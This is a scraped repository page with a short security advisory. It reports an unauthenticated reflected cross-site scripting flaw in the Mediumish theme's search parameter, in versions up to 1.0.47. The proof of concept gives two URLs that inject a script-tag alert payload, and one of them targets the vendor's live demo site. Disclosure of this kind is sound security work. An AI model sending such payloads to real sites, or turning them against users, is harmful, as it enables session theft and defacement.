🤬
..
README.md Loading last commit info...
README.md

Mediumish <= 1.0.47 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The search feature of the theme does not properly sanitise it's 's' GET parameter before output it back the page, leading to the Cross-SIte Scripting issue.

The vendor has been unresponsive to any form of contact

Proof of Concept

https://example.com/?post_type=post&s=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E



https://www.themepush.com/demo-mediumish/?post_type=post&s=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E 
Please wait...
Page is in error, reload to recover